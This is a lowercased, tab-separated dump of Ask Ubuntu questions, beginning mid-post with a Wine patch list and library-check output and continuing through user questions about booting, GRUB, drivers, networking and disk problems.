c7263660-be78-439b-979f-e745a8d87120:1 : : sebastian lackner : : wined3d : silence repeated wined3d_swapchain_present fixme . eec5dea8-879d-417b-9f97-364deaae6576:1 : : sebastian lackner : : add tests for ivmrmonitorconfig . e46b26df-3c1b-419c-9579-f0d1e1c50bea:1 : : sebastian lackner : : workaround for broken implementation of shlwapi url functions . wine : can not find l '' c : \\windows\\system32\\winemenubuilder.exe '' err : wineboot : processrunkeys error running cmd l '' c : \\windows\\system32\\winemenubuilder.exe -a -r '' ( 2 ) checking opengl ... opengl vendor : nouveau opengl renderer : gallium 0.4 on nvc1 opengl direct rendering : true opengl : passed checking fonts ... found arial in z : \opt\wine-compholio\bin\..\share\wine\fonts\\arial.ttf missing verdana fonts : failure checking acls / xattr ... acls : passed checking libraries ... libcapi20.so.3 : /usr/lib/i386-linux-gnu/libcapi20.so.3 libcups.so.2 : /usr/lib/i386-linux-gnu/libcups.so.2 libdbus-1.so.3 : /lib/i386-linux-gnu/libdbus-1.so.3 libfontconfig.so.1 : /usr/lib/i386-linux-gnu/libfontconfig.so.1 libgl.so.1 : /usr/lib/i386-linux-gnu/mesa/libgl.so.1 libgnutls.so.26 : /usr/lib/i386-linux-gnu/libgnutls.so.26 libgsm.so.1 : /usr/lib/i386-linux-gnu/libgsm.so.1 libjpeg.so.8 : /usr/lib/i386-linux-gnu/libjpeg.so.8 libncurses.so.5 : /lib/i386-linux-gnu/libncurses.so.5 libnetapi.so : missing libodbc.so.1 : /usr/lib/i386-linux-gnu/libodbc.so.1 libpng12.so.0 : /lib/i386-linux-gnu/libpng12.so.0 libsane.so.1 : /usr/lib/i386-linux-gnu/libsane.so.1 libtiff.so.5 : /usr/lib/i386-linux-gnu/libtiff.so.5 libv4l1.so.0 : /usr/lib/i386-linux-gnu/libv4l1.so.0 libxcomposite.so.1 : /usr/lib/i386-linux-gnu/libxcomposite.so.1 libxcursor.so.1 : /usr/lib/i386-linux-gnu/libxcursor.so.1 libxext.so.6 : /usr/lib/i386-linux-gnu/libxext.so.6 libxi.so.6 : /usr/lib/i386-linux-gnu/libxi.so.6 libxinerama.so.1 : /usr/lib/i386-linux-gnu/libxinerama.so.1 libxrandr.so.2 : /usr/lib/i386-linux-gnu/libxrandr.so.2 libxrender.so.1 : /usr/lib/i386-linux-gnu/libxrender.so.1 libxslt.so.1 : /usr/lib/i386-linux-gnu/libxslt.so.1 libxxf86vm.so.1 : /usr/lib/i386-linux-gnu/libxxf86vm.so.1 libraries : failure > > 64 bit < < wine-1.7.20 patches : 1b7ac850-5040-4d9e-8fde-9c483c3baf33:1 : : sebastian lackner : : add commandline option -- patches to show the patch list . 9e9a58e1-b226-4d4d-943b-be9a4c1dc525:1 : : michael müller : : add commandline option -- check-libs to test if shared libraries are installed . 8a366b6d-8ad6-4581-8aa9-66a03590a57b:2 : : erich e. hoover : : implement sio_address_list_change . 92938b89-506b-430a-ba50-32de8b286e56:6 : : erich e. hoover : : store and return security attributes with extended file attributes . 5d6bb7b5-ec88-4ed3-907d-9ad2173a2f88:1 : : sebastian lackner : : enable/disable windows when they are ( un ) mapped by foreign applications . 94186fff-6dbf-44d0-8eb1-2463d1608a0f:1 : : sebastian lackner : : update gl_drawable for embedded windows . cbe240e8-2c58-430a-b61c-7fbb9d0e1e11:1 : : sebastian lackner : : change return value of stub setnamedpipehandlestate to true . 00273da7-72f8-4025-9e96-0c2bc95dacdb:3 : : maarten lankhorst : : winepulse patches extracted from https : //launchpad.net/~ubuntu-wine/+archive/ppa/+files/wine1.7_1.7.19-0ubuntu2~trusty2.debian.tar.gz . fbea4ef6-85ac-4524-b32d-fc9882b73e5a:1 : : erich e. hoover : : implement getvolumepathname . 4cd13e94-7f2d-11e3-b5eb-0090f5c75ad5:1 : : erich e. hoover : : support for junction points/reparse points . 5fb1f5c8-7f17-11e3-9b62-0090f5c75ad5:1 : : erich e. hoover : : implement transmitfile . 3d7c4774-9e7f-11e3-9cfc-0090f5c75ad5:1 : : erich e. hoover : : implement missing fonts expected by silverlight . e7581ed7-12b3-4ed3-835b-5a62afbf9c85:4 : : sebastian lackner : : use lockfree implementation for get_cached_fd . 3405aa34-f341-11e3-83ce-0090f5c75ad5:1 : : erich e. hoover : : add default security descriptor ownership and dacls for processes . d85bf5ee-3578-4edd-be3e-35cacd53e5cc:1 : : sebastian lackner : : raise dbg_printexception_c exception in outputdebugstringa . 0b21d7ac-0387-4493-aa38-fbafe3e749f5:2 : : michael müller : : decrease minimum settimer interval to 5 ms. 2394843e-2bc4-4fa4-8368-1ef32093b89e:1 : : michael müller : : allow changing strict draw ordering through an exported function . 255473fa-4e0a-4f51-952b-4deecc1a2181:1 : : michael müller : : indicate direct rendering through opengl extension . 59bd38b7-bbdc-4cfd-9ccd-1c72c4ed84c0:1 : : sebastian lackner : : implement x11drv_flush_gdi_display extescape command . 325645ba-d39d-4de4-9c94-3fe694eedaab:1 : : sebastian lackner : : kernel32 : silence repeated comparestringex fixme . 46fb5f97-34cb-4b6b-ae10-7511db90ba1d:1 : : sebastian lackner : : avoid race-condition when unloading modules while hook is still active . acff3012-0f75-4710-9941-08b5ce4c61f3:2 : : erich e. hoover : : wined3d : silence repeated resource_check_usage fixme . c7263660-be78-439b-979f-e745a8d87120:1 : : sebastian lackner : : wined3d : silence repeated wined3d_swapchain_present fixme . eec5dea8-879d-417b-9f97-364deaae6576:1 : : sebastian lackner : : add tests for ivmrmonitorconfig . e46b26df-3c1b-419c-9579-f0d1e1c50bea:1 : : sebastian lackner : : workaround for broken implementation of shlwapi url functions . wine : can not find l '' c : \\windows\\system32\\winemenubuilder.exe '' err : wineboot : processrunkeys error running cmd l '' c : \\windows\\system32\\winemenubuilder.exe -a -r '' ( 2 ) checking opengl ... opengl vendor : nouveau opengl renderer : gallium 0.4 on nvc1 opengl direct rendering : true opengl : passed checking fonts ... found arial in z : \opt\wine-compholio\bin\..\share\wine\fonts\\arial.ttf missing verdana fonts : failure checking acls / xattr ... acls : passed checking libraries ... libcapi20.so.3 : /usr/lib/x86_64-linux-gnu/libcapi20.so.3 libcups.so.2 : /usr/lib/x86_64-linux-gnu/libcups.so.2 libdbus-1.so.3 : /lib/x86_64-linux-gnu/libdbus-1.so.3 libfontconfig.so.1 : /usr/lib/x86_64-linux-gnu/libfontconfig.so.1 libgl.so.1 : /usr/lib/x86_64-linux-gnu/mesa/libgl.so.1 libgnutls.so.26 : /usr/lib/x86_64-linux-gnu/libgnutls.so.26 libgsm.so.1 : /usr/lib/x86_64-linux-gnu/libgsm.so.1 libjpeg.so.8 : /usr/lib/x86_64-linux-gnu/libjpeg.so.8 libncurses.so.5 : /lib/x86_64-linux-gnu/libncurses.so.5 libnetapi.so : missing libodbc.so.1 : /usr/lib/x86_64-linux-gnu/libodbc.so.1 libpng12.so.0 : /lib/x86_64-linux-gnu/libpng12.so.0 libsane.so.1 : /usr/lib/x86_64-linux-gnu/libsane.so.1 libtiff.so.5 : /usr/lib/x86_64-linux-gnu/libtiff.so.5 libv4l1.so.0 : /usr/lib/x86_64-linux-gnu/libv4l1.so.0 libxcomposite.so.1 : /usr/lib/x86_64-linux-gnu/libxcomposite.so.1 libxcursor.so.1 : /usr/lib/x86_64-linux-gnu/libxcursor.so.1 libxext.so.6 : /usr/lib/x86_64-linux-gnu/libxext.so.6 libxi.so.6 : /usr/lib/x86_64-linux-gnu/libxi.so.6 libxinerama.so.1 : /usr/lib/x86_64-linux-gnu/libxinerama.so.1 libxrandr.so.2 : /usr/lib/x86_64-linux-gnu/libxrandr.so.2 libxrender.so.1 : /usr/lib/x86_64-linux-gnu/libxrender.so.1 libxslt.so.1 : /usr/lib/x86_64-linux-gnu/libxslt.so.1 libxxf86vm.so.1 : /usr/lib/x86_64-linux-gnu/libxxf86vm.so.1 libraries : failure how do i get it working ? thanks , ren
486559	uefi unable to install 14.04 on new asus desktop	i just got a new asus m11ad-us0008o desktop with windows 7 and i am unable to get it to boot from the usb or dvd . i have tried everything i can think of : disabling secure boot , csm enabled and disabled , interrupt capture enabled , ehci enabled , etc . ; and spent an hour on the phone with asus . i have installed ubuntu on other machines but am still pretty new to computers so i am really only equipped to change boot order in legacy and let the ubuntu iso do the work . my ultimate goal is to keep windows 7 , install ubuntu on another partition , and then run win7 from virtual box if i happen to need it for anything . any help would be greatly appreciated . thanks , casey
486560	fullscreen libnotify ?	is there any way to make libnotify popups appear in fullscreen apps ? if not , is there somewhere where i could make a feature request ?
486566	still getting input out of range error in grub	i 've run boot repair , uncommented the grub_gfx line , and set the resolution to 1366x768x60 ( the 60 part is the refresh rate , right ? ) with grub customizer . i still got the error , so i reinstalled/updated grub.then , i saw that all the guides i read had the resolution on the grub_gfx line without quotes , so at a last-ditch attempt to fix it , i typed `` gksudo gedit /etc/default/grub '' , removed the quotes , updated , and restarted . i still get the error `` input out of range , change to 1366x768 - refresh rate 60 '' when grub loads . now , grub still works of course , if i hit enter ubuntu loads , if i arrow down 5 lines and hit enter windows 7 loads.i only get this error in grub , all the os guis load fine , even the ubuntu recovery mode terminal . all i can say is good god , i think i 'm about to give up and just go into grub customizer , write down the boot order and number of key presses needed to get to each option , and forgo the grub gui completely since i know where everything is . trouble is , this is my mom 's computer and while i could tell her where everything is and what buttons to press , she would forget.i really do n't want to give up , is there anything else i can do ? is there something i might be doing wrong ? the pc is a compaq presario cq5210f desktop with the stock monitor if that helps ( though i don see how it would ) .here 's my grub.cfg : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default= '' 0 '' # grub_hidden_timeout= '' 0 '' grub_hidden_timeout_quiet= '' true '' grub_timeout= '' 10 '' grub_distributor= '' `lsb_release -i -s 2 > /dev/null || echo debian` '' grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal= '' console '' # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' grub_gfxmode= '' 1366x768x60 '' # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux note that it seems to have automatically added back the quote marks here 's my boot-repair log : http : //paste.ubuntu.com/7683018/
486569	where to get audacity stable ?	i 'm on ubuntu 14.04 . according to the help menu in audacity , it is version 2.0.6-alpha-may 31 2014 , and it has bugs and occasionally crashes in the middle of recording . losing an hour of recording/edits is not cool . is there a ppa download for the stable audacity 2.0.5 ?
486571	fresh 14.04 install runs slow ?	i recently just installed ubuntu 14.04 lts on my windows 7 desktop . i tried installing 11.10 before , but that 's ancient so i decided to get 14.04 . this is my first time installed linux on this computer , and my experience with linux is limited . i also freshly reinstalled windows the other day . also when i first loaded up ubuntu the desktop came up , but my mouse and keyboard froze , so i could n't do anything , which was strange . here is the comp specs : compaq presario cq5210f processor : amd athlon ii x2 215 memory : 3gb
486573	does lens exist in ubuntu14.04 ?	when i import 'lens ' from 'gi.repository ' in python , it shows that the lens does n't exist , as well as 'scope ' . but 'simplescope ' exist . is there any structural changing between ubuntu 14.04 and ubuntu 12.04 ? thx
486574	configuring sendmail for several domain names	so here 's the problem : i have a webserver that 's currently serving quite a number of different domain names as virtual hosts for apache . lets say the default domain is defaultdomain.com when i use sendmail ( via phpmailer ) from otherdomain.com , the mail that is sent has the header received : from defaultdomain.com , even though i set the from header to noreply @ otherdomain.com i suspect the mismatch is why these emails are being filtered as spam ( from what i 've read on the gmail spam filter ) what configuration in the email headers , sendmail , or postfix do i need to change to ensure emails from other virtual hosts are actually sent from their respective domain names , and thus no longer filtered as spam ?
486576	error occured in youtube-dl	what should i do if `` token '' parameter not in video info for unknown reason . this error occurred when using youtube-dl . i tried to uninstall it and re-install but this error reoccurred ... .
486579	why is this error occurring when extracting sfx files ?	i 'm trying to extract an .sfx file . but when i use the chmod u+x command , i simply recieve this output . please help me . i 'm a noob with ubuntu , and linu younes @ younes-hp-pavilion-g6-notebook-pc : ~/downloads $ chmod u+x xp.sfx # # i changed the file name younes @ younes-hp-pavilion-g6-notebook-pc : ~/downloads $ ./xp.sfx rar sfx archive extracting from ./xp.sfx extracting ie8 - winxp.ova 99 % can not find volume //xp.rar ie8 - winxp.ova - crc failed total errors : 1 younes @ younes-hp-pavilion-g6-notebook-pc : ~/downloads $
486587	how do i change my reolution in lubuntu ? ( using xrandr )	i would like help with changing my resolution . i 'm running on lubuntu ( newest version ) and i have no clue how to change my resolution . i know of going to menu > preferences > monitor settings but the max is 640x480 and i want to use 1280x1024 . the options for changing the resolution differs from changing from the nvidia graphics driver to the nouveau x.org driver . so please , can anyone help . it will be much appreciated ! output of xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 320 x 240 , current 640 x 480 , maximum 640 x 480 default connected 640x480+0+0 0mm x 0mm 640x480 50.0* 320x240 51.0 1280x1024_60.00 ( 0x1bb ) 109.0mhz h : width 1280 start 1368 end 1496 total 1712 skew 0 clock 63.7khz v : height 1024 start 1027 end 1034 total 1063 clock 59.9hz
486593	boot-repair appears to work , grub does not appear	so i am a completely new to linux , bear with me here . i made a partition and installed ubuntu 14.04 . i did not disable secure boot when i had installed ubuntu , though i have disabled it now . at first grub would appear upon startup so i could select the os . once i went into windows again grub has disappeared . if i get into the boot devices options before startup , i see os boot manager and `` ubuntu '' . if i select ubuntu it boots windows instead . the only way i can get into ubuntu is by booting from the usb i installed with and running the live session . to remedy this problem i downloaded and ran boot-repair . it appeared to work . there were no errors and the task ran to completion , provided me with some terminal lines to execute , which i did and they completed without error . i shut down and start up , windows boots automatically and grub never appears . what can i do about this ? your help is greatly appreciated .
486595	lenovo y510p : battery wont charge past 60 %	on my y510p , i set lenovos battery software to `` optimize battery health '' while i was in windows 8.1 . i forgot to change it before overwriting that partition with ubuntu , and now my battery in ubuntu never charges past 59~60 % . i think this is due to something in the bios because it persists despite my windows partition being gone . i 've searched the bios but there 's no mention of battery anywhere ! i 'm using ubuntu 14.04 lts .
486597	pressing the powerbutton does not do anything in ubuntu ( no menu )	when pressing the powerbutton in xubuntu 14.04 a menu prompt would show and allow me to logout/shutdown/ ... etc . now that i have installed ubuntu 14.04 this is not the case anymore . how can i activate this menu ?
486600	how can i replace the top row of function key with media keys ? ( thinkpad )	the thinkpad x230 has a top row of function keys which can be used as media keys by pressing fn+fx i would like to not have to press the fn keys , i.e . only pressing f11 would start playing music . i believe this used to be the behavior of ubuntu on my old macbook , but on my thinkpad this is not the case . how can i enable this ? note : unlike the thinkpad edge series , there is no option in the bios menu to enable the desired functionality .
486601	built my own computer and i have two os 's on one hdd ... . and ca n't access the original	on my computer i had originally installed windows 8.1 and ubuntu 14.04lts . by purchasing a secondary hard drive to quarantine ubuntu from windows so it would n't affect my 1.82tib main hdd . i have all ready used up a good 1tib for my video production . it would be quite a waste to have to reformat the drive and do a fresh reinstall of all my programs . i 'm using this motherboard which has an uefi : asus z87-pro lga 1150 intel z87 hdmi sata 6gb/s usb 3.0 atx intel motherboard this is the cpu i 'm using as well : intel core i5-4440 haswell quad-core 3.1ghz ( 3.3ghz turbo ) lga 1150 84w desktop processor intel hd graphics 4600 bx80646i54440 i 've never had any problems with dual booting/g parted in the past for with the old legacy equipment , but with the uefi , it 's rather buggy ... i tried to do a windows 8.1 recovery with the disc and i get some sort of message of how my hdd has been locked or something ... is there any insight into this that may help me ? ?
486602	ubuntu 14.04 lts live usb boot error ( gfxboot.c32 : not a valid com32r image )	i downloaded ubuntu 14.04 ( 64 bit ) lts . i made a bootable usb stick . but i keep receiving this error message upon booting : syslinux 4.04 edd 20110518 copyright ( c ) 1994-2011 h. peter anvin et al unknown keyword in configuration file : gfxboot.c32 : not a com32r image
486603	how do i protect an individual cell ?	i want to particular cell protected in libreoffice cal . whole sheet is protected but single cell is not protected . please guide me how we can protect a single cell in libreoffice ?
486604	ca n't run installjava executable file	i ca n't seem to run a java executable file , even though i 've already installed the latest jdk . see the below screenshot . am i using the right command , via : ~ $ open installjava or is ~ $ ./installjava the proper way to run the executable ? thank you ! your help will be very much appreciated .
486606	how to partition hd to install windows ?	i 'd like to install win 7 along with kubuntu . could anyone please tell me how should i partition the hd ? shall i partition sda1 or 3 ?
486609	what does `` lds '' stand for in the openstack reference implementation ?	looking on this page , i see `` lds '' mentioned . http : //www.ubuntu.com/cloud/ubuntu-openstack/reference-architecture go to the `` services virtualized high availability '' tab , and look at the virtualized machines under hypervisors 2 & 3 . what is it ?
486612	what is the difference between terminator and tmux ?	what is the different between tmux and terminator ? i currently use terminator which allows me to add more shell in same screen by splitting them horizontally or vertically . i read about them in some articles but i 'm still not able to figure out the main difference . i want to know what features i 'm missing if i do n't use tmux . i 'm a front-end developer . i mainly use command line to use git commands only .
486616	ubuntu touch for galaxy s4 ( i9500 )	how to install ubutnu touch on galaxy s4 ? i need dualboot , i wo n't to remove my android . when power on my device ask me for choice operation . please guide me to install ubuntu touch on samsung galaxy s4 .
486617	.pigbootup not found	i have a problem trying to get this command to run . i 've got all the files in the correct directories , and i 'm running the command from within the correct directory . i 've downloaded and unpacked pig , and copied the .jar folder into my pig directory . however , when i run the command : jon @ ubuntu : ~/pig $ java -xmx512m -cp pig-0.12.1.jar org.apache.pig.main -x local wordcount.pig i have got long error message form which the important part is : [ main ] info org.apache.pig.impl.util.utils - default bootup file /home/jon/.pigbootup not found please can any point me in the direction of where this could be going wrong ?
486620	what 's the typical algorithm that is follwed when installing a debian package with dpkg ?	how things work when you install a debian package ( s ) with dpkg ? i 'd like to have an idea of how things are handled right after your fire in the command , like the unpackaging and especially the pre-/post-configurations for the pacakges specified . how do they manage incomplete configuration for cases when there are unmet dependencies ? it would be really helpful if you add some details to the steps and/or point the the relevent sources . thank you .
486630	1920x1080 resolution for asus laptop running ubuntu studio	i 'm trying to get ubuntu studio to run at the laptop 's native resolution . i 've already installed the guest additions , which gave the os additional resolution settings , but the 1920x1080 and other widescreen resolutions are missing . i 'm running the os on virtual box . i think xrandr is meant to make this possible but i do n't understand how to download it . at muru 's request , when i typed `` xrandr -- size 1920x1080 '' , the resolution changed accordingly . the instructions do work . after reading related questions on askubuntu . i think i have to configure some file to make the setting permanent .
486633	macbook pro ( 11,2 ) mistakes one finger touch on trackpad for two	on my late-2013 macbook pro i 've set up the touchpad on ubuntu 14.04 to behave like it does on osx , with multitouch gestures . a constant annoyance is that it often reads a single-finger click or drag as a two-finger click or drag . moving the mouse is misread as scrolling . a single tap becomes a right-click rather than a left-click . whilst i 'm moving the mouse it may change to selection or drag , and is very sensitive to slight pressure changes . has anyone else had this problem ? is there a setting which would reduce its errant behaviour ? thanks .
486636	how to add security to a pdf file using libreoffice ?	how can we add security to a pdf file created using libreoffice ? i want to create pdf files which can not be edited and that is the reason for asking this question .
486637	how to restore windows 7 after installing ubuntu using windows factory reset disk	i wanted to have a feel of ubuntu so i installed ubuntu 14.04 lts on windows 7 using a usb stick to boot . but i made a horrifying mistake of not installing ubuntu on a separate partiton . this resulted in removing my windows 7 completely from my laptop along with the previous partitions . now all i have are two linux filesystem partions : one swap and one for every thing else . i have my factory default image of windows 7 burnt to a dvd . when i try to restore this image using the factory reset dvd of windows 7 i get an error saying that : '' the program can not restore the system partition because its structure is incorrect . you may have to recreate the partition to continue . '' please help me restore my windows 7 back and reinstall ubuntu alongside windows . regards robin
486641	unattended installation	i am planning to replace windows xp based 100 odd desktops with ubuntu 12.04 desktop 32bit on my clients branches across the country . at my home location i would deploy it manually as i have team to do the stuff . but my clients branches dont have technical support personal . desktops are in warranty so manufacturer takes care of any issues rest is handled remotely . i wish to install a customized copy of ubuntu 12.04 with few select packages and external softwares in unattended mode via a usb or dvd rom sent to the branch offices . wherein they will insert the dvd or usb and start the installation and they will get a ready made system . i will also send them a process document of how to assign ip address to the system so that i can take remote control and do rest of the things remaining . i would like to know if this is possible in first place ? i am checking uck right now . hope that helps . thanks in advance . to an extent this is a duplicate question , the answers of the previous questions do satisfy my query of customizing the installer cd/usb but i am not able to get the preseeding stuff clearly from it . especially if i have to include preseeding in my installer dvd/cd .
486642	ubuntu touch tasks	i have installed the sdk for ubuntu touch and the core-apps on my desktop . i love tasks . however , the touch version on my tablet does not have the trello capability . can anyone tell me how i can get the desktop version on to my touch device . thanks in anticipation .
486645	2 ubuntu dhcp servers	i would like to run 2 dhcp servers at the same time , each one should have differnt ip but both in the same subnet , same gateway but one has to have the first half of the dhcp rang and the other the second half . how should i do that ( i can configure the servers , no problem ) but should n't i point one to the other ? if yes , then which command or how can i do it . ( at the moment i have 2 window 2008 servers : 192 168.111.11 /24 with the first half of the range and 192.168.111.20 /24 with the second half of the range and i had to point the 111.20 to be looking at the 111.11 ) . i would like to replace them with 2 ubuntu dhcp servers . many thanks in advance madona
486648	mouse buttons do n't work after suspend	i an using ubuntu 14.04 the mouse is a microsoft wireless mobile mouse when the computer resumes after suspend the cursor moves correctly but the mouse buttons do n't work . a power reset is required .
486653	kubuntu bug ? when laptop is connected to hdmi-monitor suspend does not work	i am using a laptop from packard bell , model easynote f2011hc-100ge . when it is connected with hdmi to a monitor , the `` suspend session after 15 min '' does not work anymore . the laptop can not supspend . it seems to me that this is a bug of the `` kde control module '' in latest kubuntu 14.04 lts . does anyone know how to solve this ? or if this will be fixed ? screenshot of my energy saving settings :
486655	how can i set up a broadband connection ?	i tried to set up broadband internet connection , started as i found in this question sudo pppoeconf and shown that wifi was disabled . sorry , i scanned 2 interfaces , but the access concentrator of your provider did not respond . please check your network and modem cables . another reason for the scan failure may also be another running pppoe process which controls the modem . and the result found below my command was siocsifflags : operation not possible due to rf-kill if the same command runs after enabling wifi , no result is showing in terminal . then i tried another command sudo ifconfig and got this result : eth0 link encap : ethernet hwaddr 20:89:84 : ea:68:5d up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:8947 errors:0 dropped:0 overruns:0 frame:0 tx packets:8947 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:961374 ( 961.3 kb ) tx bytes:961374 ( 961.3 kb ) wlan0 link encap : ethernet hwaddr 48 : d2:24:3f:4f:3e inet addr:192.168.59.104 bcast:192.168.59.255 mask:255.255.255.0 inet6 addr : fe80 : :4ad2:24ff : fe3f:4f3e/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:241942 errors:0 dropped:0 overruns:0 frame:0 tx packets:173747 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:338342037 ( 338.3 mb ) tx bytes:18314966 ( 18.3 mb ) can anyone please explain to me what the is problem and what steps i should follow to resolve it ?
486656	will my ubuntu one data be removed completely with the impending shutdown ?	it 's been announced that ubuntu one cloud backup service will be shut down soon . the announcement offers an app that helps download the backup data before the service finally gets buried . downloading data or not , does it have to be explicitly deleted by the owner ( by me , for instance ) ? or is it contract-guaranteed by the provider ( ubuntu one ) to be completely removed from the cloud after the deadline as announced ?
486658	problem with text on ubuntu 14.04 ( freenx )	after reconnecting to freenx session i do n't have any text on display , only windows , panels and not one letter . i use ubuntu 14.04 , freenx-server , mate and remmina with nx-plugin on the client computer .
486660	only one external screen deteced and the other one is mirrored	i am very new to ubuntu . i have dell laptop e5440 with ubuntu 14.04 connected to a dock with 2 dvi-d port and one vgi port . i am trying to setup my two hp external screens to be extended but i am not able to . the main issue is i see only monitor , the other one is mirrored to it no matter what i do and i have only intel速 haswell mobile is my graphic card . this is my xrandr command screen 0 : minimum 320 x 200 , current 1600 x 900 , maximum 32767 x 32767 edp1 connected ( normal left inverted right x axis y axis ) 1366x768 60.0 + 40.0 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 dp1 connected primary 1600x900+0+0 ( normal left inverted right x axis y axis ) 443mm x 249mm 1600x900 60.0*+ 3200x900 60.0 2560x1024 60.0 1280x1024 60.0 1440x900 59.9 1280x720 60.0 1024x768 60.0 800x600 60.3 640x480 60.0 720x400 70.1 hdmi1 disconnected ( normal left inverted right x axis y axis ) hdmi2 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) any idea how i can solve this thanks
486663	ubuntu 14.04 : audio doesnt work until i change the volume	i have this weird bug that i think i also had with 13.30 , where i a movie or spotify , it doesnt matter which application , and the audio would n't play at all . of course my first reaction would be to increase the system audio volume , in case it was at 0 % . even thought that is not the case , i have noticed that when the system volume reaches around 80 % , audio suddenly starts working . after that point , i can put the volume back at its original lever , whatever that was , and it would play nicely . but everytime i start a new application , like spotify , vlc or similar , i get over and over this error . is this a known bug ? is there a solution or workaround ?
486668	how do i install javatm advanced imaging api v1.1.3 on ubuntu 14.04	i 'm trying compare images as described on this website but therefor i need to have jai installed . i have downloaded the file jai-1_1_3-lib-linux-amd64.tar.gz from here . i 've also looked into the installationguide but i feel kind of lost and do n't know how to go on from here . my specs : os : ubuntu 14.04 trusty tahr - 64bit java : java version `` 1.6.0_41 '' java ( tm ) se runtime environment ( build 1.6.0_41-b02 ) java hotspot ( tm ) 64-bit server vm ( build 20.14-b01 , mixed mode ) if any other information is needed , i 'll be happy to provide it . thanks in advance !
486670	gnome-do wont recognize anything after crashing	i was trying to activate the skype plugin for gnome-do and the app crashed on me . now after restarting it , no matter what i type inside , it wont recognize anything . i have tried to re install it clean like this apt-get purge gnome-do apt-get install gnome-do and it still did not solve the problem . what can i do ?
486672	nvidia current shows 304 driver but i require a 331 driver	i want to install cuda toolkit 6 on my ubuntu 12.04 . while trying to install the nvidia driver , the command : sudo apt-get install nvidia-current shows : nvidia-304 nvidia-current nvidia-settings-304 but my graphic card is nvidia geforce gt630m and as per the nvidia website it says it has 331.79 drivers . i installed 331.79 driver using .run and the system does n't seem to recognize it . so ca n't i install 331.79 ? why is my current driver still 304 ?
486675	disk space usage issue please help	this morning i wake up and a lot of my files has been wiped due to storage issues i checked the console and seems like i do n't have more storage could someone help me understand why ? , my servers are only using 20gb in total my disk has 120gb ssd : dev/root is using 100 % and i have 0 available for some reason , how could i fix this ? , i 'm new with ubuntu
486678	unity-greeter login background wo n't change according to the user that is highlighted	i use ubuntu 12.04 . recently , i change to use another accounts service which could remove certain users from the graphic login screen of unity-greeter . i downloaded source code from a branch of https : //github.com/mmonaco/accountsservice.git which is named exclude-v3 . after compiling and installation , things seem to work . however , i found that the background of unity-greeter is always that purple one , not my wallpaper as before . and when changing the highlight user name to login , the background wo n't change at all . i have tried all of the following methods , but none of them seems to work . 1 ) change my wallpaper and then change back to the original one , or 2 ) `` gsettings set com.canonical.unity-greeter draw-user-backgrounds true '' or do that under the name of user lightdm i also checked `` /var/lib/accountsservice/users/myusername `` to ensure the setting there is correct . i checked the permission of the wallpaper file , which is `` -rw-r -- r -- '' and belongs to me . so is there anyone who can give me some advice on what next i could try , or should i directly contact with the one who works on that new branch ? ( actually it seems not that new according to the last commit date ) thanks a lot !
486679	if a card reader + its driver are pc/sc compliant in windows , is it pc/sc compliant in ubuntu ?	i have two basic questions and find no one and nowhere to ask them . finally send them to you . if a card reader+ its driver was pc/sc compliant in windows , is it pc/sc compliant in other oss too ? ( for example in linux , macos and ... ) . or for each os we need a new test ? if i have a card reader and i do n't want to trust its factory and the list that is in the pc/sc workgroup site , can i myself check its compatibility with pcsc or not ? i mean , is there any check list to checking ? i would appreciate a detailed answer .
486681	nvidia drivers causing blank screen with x mouse icon	i recently decided to switch to the nvidia proprietary drivers on my linux mint 16 desktop . i added the xorg-edgers ppa and installed the nvidia-current package . upon rebooting , i did n't get the usual linux mint logo and instead i got a blank screen with the x mouse cursor . i tried to use alt + ctrl + f1 to open a new terminal , but that did not do anything . it seems like x is starting correctly , but the drivers are not loading . i 'd like to just uninstall the drivers , but i ca n't even get a terminal . is there a way to salvage my system without doing a re-install ?
486689	accidentally messed up my filesystem wtih mv - grub rescue >	let 's start with saying that i 'm a very inexperienced not-so-poweruser . last night i was trying to move every file in a directory to another location , but accidentally did this : mv stuff /* /home/user/downloads i was connected to the remote vm through ssh , and from that command onward , everything started crashing and burning . no command on the terminal would be recognised , not ls , not cd , nothing , and the left part of the console , which usually stated something like dimitris # > _ had turned to just # > _ i restarted the machine and now it boots me into grub rescue > _ i tried ls , i 've got three hd ( ) s : hd ( 0 ) , hd ( 0 , msdos1 ) , fd ( 0 ) first one has an unrecognized filesystem ( possibly the normal hd that i messed up since i moved everything to /home/user/downloads ) second one has some directories : third one's first sector can not be read . anything i can do to revert the last change , or anything ? or is it a fatal messup ? i 'm fine with just destroying the vm and creating again , but i 'd rather not lose my /var/www/ directory .
486695	deja dup restore procedure after hard drive failure	after a hard drive fails , and is replaced . what is the procedure to get up and running again , using deja dup backup from external usb drive . this has not happened yet , but i am planning my disaster recovery . do i just : 1 . install ubuntu 2 . run deja dup - recovery and everything is up and running again ? or do i need something like 'ghost ' to clone my drive as backup ? my system includes : apache2 , mysql , php as well as the standard /home stuff .
